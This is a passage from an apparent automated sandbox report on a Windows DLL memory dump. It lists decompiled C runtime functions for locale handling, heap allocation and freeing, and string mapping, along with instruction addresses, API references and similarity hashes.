																	_t103 = _t377 + 2; // 0x6
																	_t463 = _t103 << 4;
																	__eflags = _t463;
																	_t294 =  &_v280;
																	_v720 = _t463;
																	_t397 =  *((intOrPtr*)(_t463 + _t444));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t294 -  *_t397;
																		_t465 = _v720;
																		if( *_t294 !=  *_t397) {
																			break;
																		}
																		__eflags =  *_t294;
																		if( *_t294 == 0) {
																			L91:
																			_t295 = _v712;
																		} else {
																			_t470 =  *((intOrPtr*)(_t294 + 2));
																			__eflags = _t470 -  *((intOrPtr*)(_t397 + 2));
																			_v714 = _t470;
																			_t465 = _v720;
																			if(_t470 !=  *((intOrPtr*)(_t397 + 2))) {
																				break;
																			} else {
																				_t294 = _t294 + 4;
																				_t397 = _t397 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t295;
																		if(_t295 != 0) {
																			_t398 =  &_v280;
																			_t436 = _t398 + 2;
																			do {
																				_t296 =  *_t398;
																				_t398 = _t398 + 2;
																				__eflags = _t296 - _v712;
																			} while (_t296 != _v712);
																			_v716 = (_t398 - _t436 >> 1) + 1;
																			_t299 = E6EE44756(4 + ((_t398 - _t436 >> 1) + 1) * 2);
																			_v732 = _t299;
																			__eflags = _t299;
																			if(_t299 == 0) {
																				goto L124;
																			} else {
																				_v728 =  *((intOrPtr*)(_t465 + _t444));
																				_v748 =  *(_t444 + 0xa0 + _t377 * 4);
																				_v752 =  *(_t444 + 8);
																				_t405 =  &_v280;
																				_v736 = _t299 + 4;
																				_t301 = E6EE485D1(_t299 + 4, _v716, _t405);
																				_t483 = _t482 + 0xc;
																				__eflags = _t301;
																				if(_t301 != 0) {
																					_t302 = _v712;
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					E6EE3AC93();
																					asm("int3");
																					_push(_t473);
																					_push(_t405);
																					_v1336 = _v1336 & 0x00000000;
																					_t305 = E6EE44DE4(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t305;
																					if(_t305 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t307 = _v20;
																					__eflags = _t307;
																					if(_t307 == 0) {
																						goto L134;
																					}
																					return _t307;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t465 + _t444)) = _v736;
																					if(_v280 != 0x43) {
																						L102:
																						_t310 = E6EE46935(_t377, _t444,  &_v708);
																						_t437 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t437 = _v712;
																							_t310 = _t437;
																						}
																					}
																					 *(_t444 + 0xa0 + _t377 * 4) = _t310;
																					__eflags = _t377 - 2;
																					if(_t377 != 2) {
																						__eflags = _t377 - 1;
																						if(_t377 != 1) {
																							__eflags = _t377 - 5;
																							if(_t377 == 5) {
																								 *((intOrPtr*)(_t444 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t444 + 0x10)) = _v724;
																						}
																					} else {
																						_t469 = _v740;
																						 *(_t444 + 8) = _v724;
																						_v716 = _t469[8];
																						_t417 = _t469[9];
																						_v724 = _t417;
																						while(1) {
																							__eflags =  *(_t444 + 8) -  *(_t469 + _t437 * 8);
																							if( *(_t444 + 8) ==  *(_t469 + _t437 * 8)) {
																								break;
																							}
																							_t339 =  *(_t469 + _t437 * 8);
																							_t417 =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _v724;
																							_t437 = _t437 + 1;
																							_t377 = _v744;
																							_v716 = _t339;
																							_v724 = _t417;
																							__eflags = _t437 - 5;
																							if(_t437 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t437 - 5;
																							if(__eflags == 0) {
																								_t331 = E6EE4C37D(_t377, _t437, _t444, _t469, __eflags, _t499, _v712, 1, 0x6ee5f7d0, 0x7f,  &_v536,  *(_t444 + 8), 1);
																								_t483 = _t483 + 0x1c;
																								__eflags = _t331;
																								if(_t331 == 0) {
																									_t418 = _v712;
																								} else {
																									_t333 = _v712;
																									do {
																										 *(_t473 + _t333 * 2 - 0x20c) =  *(_t473 + _t333 * 2 - 0x20c) & 0x000001ff;
																										_t333 = _t333 + 1;
																										__eflags = _t333 - 0x7f;
																									} while (_t333 < 0x7f);
																									_t335 = E6EE37FB0( &_v536,  *0x6ee77c20, 0xfe);
																									_t483 = _t483 + 0xc;
																									__eflags = _t335;
																									_t418 = 0 | _t335 == 0x00000000;
																								}
																								_t469[1] = _t418;
																								 *_t469 =  *(_t444 + 8);
																							}
																							 *(_t444 + 0x18) = _t469[1];
																							goto L122;
																						}
																						__eflags = _t437;
																						if(_t437 != 0) {
																							 *_t469 =  *(_t469 + _t437 * 8);
																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _t417;
																						}
																						goto L110;
																					}
																					L122:
																					_t311 = _t377 * 0xc;
																					_t204 = _t311 + 0x6ee5f858; // 0x6ee35745
																					 *0x6ee5714c(_t444);
																					_t313 =  *((intOrPtr*)( *_t204))();
																					_t409 = _v728;
																					__eflags = _t313;
																					if(_t313 == 0) {
																						__eflags = _t409 - 0x6ee77ce8;
																						if(_t409 != 0x6ee77ce8) {
																							_t468 = _t377 + _t377;
																							__eflags = _t468;
																							asm("lock xadd [eax], ecx");
																							if(_t468 != 0) {
																								goto L129;
																							} else {
																								E6EE4471C( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
																								E6EE4471C( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
																								E6EE4471C( *(_t444 + 0xa0 + _t377 * 4));
																								_t412 = _v712;
																								 *(_v720 + _t444) = _t412;
																								 *(_t444 + 0xa0 + _t377 * 4) = _t412;
																							}
																						}
																						_t410 = _v732;
																						 *_t410 = 1;
																						 *((intOrPtr*)(_t444 + 0x28 + (_t377 + _t377) * 8)) = _t410;
																					} else {
																						 *((intOrPtr*)(_v720 + _t444)) = _t409;
																						E6EE4471C( *(_t444 + 0xa0 + _t377 * 4));
																						 *(_t444 + 0xa0 + _t377 * 4) = _v748;
																						E6EE4471C(_v732);
																						 *(_t444 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			__eflags = _v16 ^ _t473;
																			return E6EE361A7(_v16 ^ _t473);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t295 = _t294 | 0x00000001;
																	__eflags = _t295;
																	goto L93;
																}
															} else {
																_t341 = _t459 + _t459;
																__eflags = _t341 - 0x106;
																if(_t341 >= 0x106) {
																	E6EE36371();
																	goto L83;
																} else {
																	 *((short*)(_t472 + _t341 - 0x10c)) = 0;
																	_t343 =  &_v276;
																	_push(_t343);
																	_push(_v456);
																	_push(_t440);
																	L84();
																	_t394 = _v452;
																	_t478 = _t480 + 0xc;
																	__eflags = _t343;
																	if(_t343 != 0) {
																		_t394 = _t394 + 1;
																		_v452 = _t394;
																	}
																	L55:
																	_t456 = _t372 + _t459 * 2;
																	_t279 =  *_t456 & 0x0000ffff;
																	_t431 = _t279;
																	__eflags = _t279;
																	if(_t279 != 0) {
																		_t456 = _t456 + 2;
																		__eflags = _t456;
																		_t431 =  *_t456 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t394;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t344 = 0x3b;
														__eflags =  *_t372 - _t344;
														if( *_t372 != _t344) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t456;
						if(_t456 != 0) {
							_push(_t456);
							_push(_t259);
							_push(_t440);
							L84();
						}
						L81:
						__eflags = _v12 ^ _t472;
						return E6EE361A7(_v12 ^ _t472);
					}
				}
				L136:
			}

0x6ee47040
0x6ee47040
0x6ee47048
0x6ee47049
0x6ee47052
0x6ee4705a
0x6ee4705c
0x6ee4705e
0x6ee47061
0x6ee4717e
0x6ee47181
0x6ee47067
0x6ee47067
0x6ee47068
0x6ee4706a
0x6ee4706a
0x6ee4706d
0x6ee47070
0x6ee47073
0x6ee47076
0x6ee47078
0x6ee4707b
0x6ee47080
0x6ee4708e
0x6ee47098
0x6ee4709b
0x6ee4709e
0x6ee4709e
0x6ee470a9
0x6ee470ae
0x6ee470b3
0x00000000
0x6ee470b9
0x6ee470bc
0x6ee470bc
0x6ee470bf
0x6ee470c1
0x6ee470c4
0x6ee470c6
0x6ee470c6
0x6ee470c6
0x6ee470c9
0x6ee470c9
0x6ee470c9
0x6ee470cf
0x00000000
0x00000000
0x6ee470d4
0x6ee470eb
0x6ee470eb
0x6ee470d6
0x6ee470d6
0x6ee470de
0x00000000
0x6ee470e0
0x6ee470e0
0x6ee470e3
0x6ee470e9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee470e9
0x6ee470de
0x6ee470f4
0x6ee470f4
0x6ee470f9
0x6ee470fe
0x6ee47102
0x6ee4710e
0x6ee47111
0x6ee47114
0x6ee4711e
0x6ee47126
0x6ee4712e
0x00000000
0x6ee47134
0x6ee47138
0x6ee47183
0x6ee4718c
0x6ee4718f
0x6ee47191
0x6ee47195
0x6ee47199
0x6ee4719e
0x6ee471a3
0x6ee47199
0x6ee471a7
0x6ee471a9
0x6ee471ab
0x6ee471af
0x6ee471b0
0x6ee471b5
0x6ee471ba
0x6ee471b0
0x6ee471bd
0x6ee471c0
0x6ee471c3
0x6ee471c6
0x6ee471c9
0x6ee4713a
0x6ee4713d
0x6ee47140
0x6ee47142
0x6ee47146
0x6ee4714a
0x6ee4714f
0x6ee47154
0x6ee4714a
0x6ee4715a
0x6ee4715c
0x6ee47161
0x6ee47166
0x6ee4716b
0x6ee47161
0x6ee4716c
0x6ee47170
0x6ee47170
0x6ee47173
0x6ee47177
0x6ee4717a
0x6ee4717a
0x00000000
0x6ee4717d
0x00000000
0x6ee4712e
0x6ee470ef
0x6ee470f1
0x6ee470f1
0x00000000
0x6ee470f1
0x6ee471d0
0x6ee471d1
0x6ee471d2
0x6ee471d3
0x6ee471d4
0x6ee471d5
0x6ee471da
0x6ee471de
0x6ee471e0
0x6ee471e6
0x6ee471ed
0x6ee471f0
0x6ee471f3
0x6ee471f4
0x6ee471f5
0x6ee471f8
0x6ee471f9
0x6ee471fc
0x6ee47202
0x6ee47204
0x6ee47229
0x6ee47233
0x6ee47239
0x6ee4723b
0x6ee47241
0x6ee47243
0x6ee474a3
0x6ee474a4
0x00000000
0x6ee47249
0x6ee47249
0x6ee4724d
0x6ee473bb
0x6ee473d8
0x6ee473dd
0x6ee473e0
0x6ee473e2
0x6ee473e8
0x6ee473ea
0x6ee473ed
0x6ee473ef
0x6ee473f5
0x6ee473f5
0x6ee473f7
0x6ee4747e
0x6ee4747e
0x6ee473fd
0x6ee473fd
0x6ee473ff
0x6ee47405
0x6ee47408
0x6ee4740b
0x6ee47411
0x00000000
0x00000000
0x6ee47413
0x6ee47417
0x6ee47440
0x6ee47442
0x6ee47419
0x6ee47419
0x6ee4741d
0x6ee47421
0x6ee47428
0x6ee4742e
0x00000000
0x6ee47430
0x6ee47430
0x6ee47433
0x6ee47436
0x6ee4743e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4743e
0x6ee4742e
0x6ee4744d
0x6ee4744d
0x6ee4744f
0x6ee4747d
0x6ee4747d
0x00000000
0x6ee47451
0x6ee47451
0x6ee47457
0x6ee47458
0x6ee47459
0x6ee4745a
0x6ee4745f
0x6ee47465
0x6ee47468
0x6ee4746a
0x6ee47473
0x6ee47475
0x6ee4746c
0x6ee4746c
0x00000000
0x6ee4746d
0x6ee4746a
0x00000000
0x6ee4744f
0x6ee47446
0x6ee47448
0x6ee4744b
0x00000000
0x6ee4744b
0x6ee47484
0x6ee47484
0x6ee47485
0x6ee47488
0x6ee4748e
0x6ee4748e
0x6ee47497
0x6ee47499
0x00000000
0x6ee4749b
0x6ee4749b
0x6ee4749d
0x00000000
0x6ee4749f
0x6ee4749f
0x6ee4749d
0x6ee47499
0x00000000
0x6ee47253
0x6ee47253
0x6ee47258
0x00000000
0x6ee4725e
0x6ee4725e
0x6ee47263
0x00000000
0x6ee47269
0x6ee47269
0x6ee4726f
0x6ee47274
0x6ee47276
0x6ee4727d
0x6ee4727e
0x6ee47280
0x00000000
0x00000000
0x6ee47286
0x6ee47286
0x6ee4728a
0x6ee47290
0x00000000
0x6ee47296
0x6ee47298
0x6ee47299
0x6ee4729c
0x00000000
0x6ee472a2
0x6ee472a2
0x6ee472a8
0x6ee472ad
0x6ee472b7
0x6ee472bb
0x6ee472c0
0x6ee472c3
0x6ee472c5
0x00000000
0x6ee472c7
0x6ee472c7
0x6ee472c9
0x6ee472cc
0x6ee472cc
0x6ee472cf
0x6ee472d2
0x6ee472d2
0x6ee472dd
0x6ee472df
0x6ee472e1
0x00000000
0x00000000
0x6ee472e1
0x00000000
0x6ee472e3
0x6ee472e3
0x6ee472e9
0x6ee472ec
0x6ee472ec
0x6ee472fa
0x6ee47303
0x6ee47308
0x6ee4730e
0x6ee47311
0x6ee47312
0x6ee47314
0x6ee47322
0x6ee47322
0x6ee47329
0x6ee4738a
0x00000000
0x6ee4732b
0x6ee4732b
0x6ee47339
0x6ee4733e
0x6ee47341
0x6ee47343
0x6ee474be
0x6ee474c0
0x6ee474c1
0x6ee474c2
0x6ee474c3
0x6ee474c4
0x6ee474c5
0x6ee474ca
0x6ee474cd
0x6ee474ce
0x6ee474d6
0x6ee474dd
0x6ee474e0
0x6ee474e1
0x6ee474e4
0x6ee474e8
0x6ee474e9
0x6ee474ec
0x6ee474fc
0x6ee4751f
0x6ee47524
0x6ee47527
0x6ee47529
0x6ee477df
0x6ee477df
0x00000000
0x6ee4752f
0x6ee4752f
0x6ee47532
0x6ee47532
0x6ee47535
0x6ee4753b
0x6ee47544
0x6ee47546
0x6ee47549
0x6ee47550
0x6ee47553
0x6ee47559
0x00000000
0x00000000
0x6ee4755b
0x6ee4755f
0x6ee47588
0x6ee47588
0x6ee47561
0x6ee47561
0x6ee47565
0x6ee47569
0x6ee47570
0x6ee47576
0x00000000
0x6ee47578
0x6ee47578
0x6ee4757b
0x6ee4757e
0x6ee47586
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee47586
0x6ee47576
0x6ee47595
0x6ee47595
0x6ee47597
0x6ee475a0
0x6ee475a6
0x6ee475a9
0x6ee475a9
0x6ee475ac
0x6ee475af
0x6ee475af
0x6ee475bf
0x6ee475cd
0x6ee475d2
0x6ee475d9
0x6ee475db
0x00000000
0x6ee475e1
0x6ee475e7
0x6ee475f4
0x6ee475fd
0x6ee47603
0x6ee47610
0x6ee47617
0x6ee4761c
0x6ee4761f
0x6ee47621
0x6ee4785f
0x6ee47865
0x6ee47866
0x6ee47867
0x6ee47868
0x6ee47869
0x6ee4786a
0x6ee4786f
0x6ee47872
0x6ee47875
0x6ee47876
0x6ee47888
0x6ee4788d
0x6ee4788f
0x6ee47898
0x00000000
0x6ee47898
0x6ee47891
0x6ee47894
0x6ee47896
0x00000000
0x00000000
0x6ee4789e
0x6ee47627
0x6ee47627
0x6ee47635
0x6ee47638
0x6ee4764e
0x6ee47655
0x6ee4765a
0x6ee4763a
0x6ee4763a
0x6ee47642
0x00000000
0x6ee47644
0x6ee47644
0x6ee4764a
0x6ee4764a
0x6ee47642
0x6ee47661
0x6ee47668
0x6ee4766b
0x6ee47769
0x6ee4776c
0x6ee47779
0x6ee4777c
0x6ee47784
0x6ee47784
0x6ee4776e
0x6ee47774
0x6ee47774
0x6ee47671
0x6ee47671
0x6ee4767d
0x6ee47683
0x6ee47689
0x6ee4768c
0x6ee47692
0x6ee47695
0x6ee47698
0x00000000
0x00000000
0x6ee4769a
0x6ee476a3
0x6ee476a7
0x6ee476b0
0x6ee476b4
0x6ee476b5
0x6ee476bb
0x6ee476c1
0x6ee476c7
0x6ee476ca
0x00000000
0x00000000
0x6ee476cc
0x6ee476eb
0x6ee476eb
0x6ee476ee
0x6ee4770b
0x6ee47710
0x6ee47713
0x6ee47715
0x6ee47753
0x6ee47717
0x6ee47717
0x6ee4771d
0x6ee47722
0x6ee4772a
0x6ee4772b
0x6ee4772b
0x6ee47742
0x6ee47749
0x6ee4774c
0x6ee4774e
0x6ee4774e
0x6ee47759
0x6ee4775f
0x6ee4775f
0x6ee47764
0x00000000
0x6ee47764
0x6ee476ce
0x6ee476d0
0x6ee476d5
0x6ee476db
0x6ee476e4
0x6ee476e7
0x6ee476e7
0x00000000
0x6ee476d0
0x6ee47787
0x6ee47787
0x6ee4778b
0x6ee47793
0x6ee47799
0x6ee4779c
0x6ee477a2
0x6ee477a4
0x6ee477f0
0x6ee477f6
0x6ee477fd
0x6ee477fd
0x6ee47803
0x6ee47807
0x00000000
0x6ee47809
0x6ee4780d
0x6ee47816
0x6ee47822
0x6ee47830
0x6ee47836
0x6ee47839
0x6ee47839
0x6ee47807
0x6ee47848
0x6ee47850
0x6ee47859
0x6ee477a6
0x6ee477ac
0x6ee477b6
0x6ee477c8
0x6ee477cf
0x6ee477dc
0x00000000
0x6ee477dc
0x00000000
0x6ee477a4
0x6ee47621
0x6ee47599
0x6ee477e1
0x6ee477e6
0x6ee477ef
0x6ee477ef
0x00000000
0x6ee47597
0x6ee47590
0x6ee47592
0x6ee47592
0x00000000
0x6ee47592
0x6ee47349
0x6ee47349
0x6ee4734c
0x6ee47351
0x6ee474b9
0x00000000
0x6ee47357
0x6ee47359
0x6ee47361
0x6ee47367
0x6ee47368
0x6ee4736e
0x6ee4736f
0x6ee47374
0x6ee4737a
0x6ee4737d
0x6ee4737f
0x6ee47381
0x6ee47382
0x6ee47382
0x6ee47390
0x6ee47390
0x6ee47393
0x6ee47396
0x6ee47398
0x6ee4739b
0x6ee4739d
0x6ee4739d
0x6ee473a0
0x6ee473a0
0x6ee473a3
0x6ee473a6
0x00000000
0x6ee473ac
0x6ee473ac
0x6ee473ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee473ae
0x6ee473a6
0x6ee47351
0x6ee47343
0x6ee47316
0x6ee47318
0x6ee47319
0x6ee4731c
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4731c
0x6ee47314
0x6ee4729c
0x00000000
0x6ee47290
0x00000000
0x6ee473b4
0x6ee47263
0x6ee47258
0x6ee4724d
0x6ee47206
0x6ee47206
0x6ee47208
0x6ee4720a
0x6ee4720b
0x6ee4720c
0x6ee4720d
0x6ee47212
0x6ee474aa
0x6ee474af
0x6ee474b8
0x6ee474b8
0x6ee47204
0x00000000

APIs

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

_free.LIBCMT ref: 6EE4714F
_free.LIBCMT ref: 6EE47166
_free.LIBCMT ref: 6EE47183
_free.LIBCMT ref: 6EE4719E
_free.LIBCMT ref: 6EE471B5

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: d5872119da1511ba896db1276edb3750b6a79a98fb622c56be469e64267c7f7e
Instruction ID: d5f17420061b98bbc5ab3130f7f07c237e7654b2765e8ce4faceacca16f13210
Opcode Fuzzy Hash: d5872119da1511ba896db1276edb3750b6a79a98fb622c56be469e64267c7f7e
Instruction Fuzzy Hash: 2C5193B1A10605EFDB51DFA9EC40AAA77F9EF45324F20456DE849DB394E731EA01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDD03F0, Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDD03F0(void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _t31;

				E6EE3449E( &_v28, 0);
				_t31 =  *0x6ee788f8; // 0x3339220
				_v8 = _t31;
				_v24 = E6EDD0D30(0x6ee789e0);
				_v16 = E6EDD1060(_a4, _v24);
				if(_v16 == 0) {
					if(_v8 == 0) {
						__eflags = E6EDD0F90( &_v8, _a4) - 0xffffffff;
						if(__eflags != 0) {
							_v12 = _v8;
							E6EDD00A0( &_v20, _v12);
							E6EE34679(__eflags, _v12);
							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 4))))();
							 *0x6ee788f8 = _v8;
							_v16 = _v8;
							E6EDD1B00( &_v20);
							E6EDD0A90( &_v20);
						} else {
							E6EDD1300();
						}
					} else {
						_v16 = _v8;
					}
				}
				_v32 = _v16;
				E6EE344F6( &_v28);
				return _v32;
			}

0x6edd03fb
0x6edd0400
0x6edd0405
0x6edd0412
0x6edd0421
0x6edd0428
0x6edd042e
0x6edd0448
0x6edd044b
0x6edd0457
0x6edd0461
0x6edd046a
0x6edd047d
0x6edd0482
0x6edd048a
0x6edd0490
0x6edd0498
0x6edd044d
0x6edd044d
0x6edd044d
0x6edd0430
0x6edd0433
0x6edd0433
0x6edd042e
0x6edd04a0
0x6edd04a6
0x6edd04b1

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EDD03FB
int.LIBCPMTD ref: 6EDD040D

Part of subcall function 6EDD0D30: std::_Lockit::_Lockit.LIBCPMT ref: 6EDD0D46
Part of subcall function 6EDD0D30: std::_Lockit::~_Lockit.LIBCPMT ref: 6EDD0D70

Concurrency::cancel_current_task.LIBCPMTD ref: 6EDD044D
std::_Lockit::~_Lockit.LIBCPMT ref: 6EDD04A6

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 4ffbcdcd1c34b87f616a61ce6008ceb148216c33edd363f79d143c92d884b287
Instruction ID: 243b95f1228d9051bf2cff8797192e3007c1f2efb2ac9c0845593c34ea31aec3
Opcode Fuzzy Hash: 4ffbcdcd1c34b87f616a61ce6008ceb148216c33edd363f79d143c92d884b287
Instruction Fuzzy Hash: A0210975D00119EFCB04DFE4D890AEEB7B9EF84344F2085A9D41567290EB30AE49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE50FAA, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE50FAA(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6ee77b80; // 0x6ee77bd4
					if(_t23 != 0) {
						E6EE4471C(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6ee77b84; // 0x6ee79144
					if(_t24 != 0) {
						E6EE4471C(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6ee77b88; // 0x6ee79144
					if(_t25 != 0) {
						E6EE4471C(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6ee77bb0; // 0x6ee77bd8
					if(_t26 != 0) {
						E6EE4471C(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6ee77bb4; // 0x6ee79148
					if(_t27 != 0) {
						return E6EE4471C(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 6EE50FC2

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE50FD4
_free.LIBCMT ref: 6EE50FE6
_free.LIBCMT ref: 6EE50FF8
_free.LIBCMT ref: 6EE5100A

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 288ee0241f6d6b608c0bb816834ca791263d39a76d9272cc3cab97d16570584f
Instruction ID: 7423fdcb804e261c156590b8124766d0cb939995aed2ddb666f836f6d6e35585
Opcode Fuzzy Hash: 288ee0241f6d6b608c0bb816834ca791263d39a76d9272cc3cab97d16570584f
Instruction Fuzzy Hash: 20F08771218A159B8A80CED8E4D5C4B3BDEAB02328B340C0AF018D3784DB31F882CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4C480, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E6EE4C480(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _t41;
				signed int _t49;
				void* _t52;
				signed int _t56;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t68;
				intOrPtr* _t71;
				intOrPtr _t85;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t68 = E6EE42779(_a16, _t93);
					_t103 = _t68 - _t93;
					_t4 = _t68 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t68;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t85 = E6EE4D1B6(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t85;
				if(_t85 == 0) {
					L39:
					return E6EE361A7(_v8 ^ _t96);
				} else {
					_t17 = _t85 + _t85 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t85 + _t85 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0) {
							L37:
							_t95 = 0;
							L38:
							E6EE35FB5(_t71);
							goto L39;
						}
						_t52 = E6EE4D1B6(_t88, 1, _a16, _t93, _t71, _t85);
						_t100 = _t98 + 0x18;
						if(_t52 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E6EE44F21(_a8, _a12, _t71, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t56 = _t95 + _t95 & _t31;
							if(_t56 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E6EE44F21(_a8, _a12, _t71, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E6EE35FB5(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t60 = E6EE4D232();
									_t95 = _t60;
									if(_t60 != 0) {
										E6EE35FB5(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t56 > 0x400) {
								_t91 = E6EE44756(_t56);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E6EE37060();
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
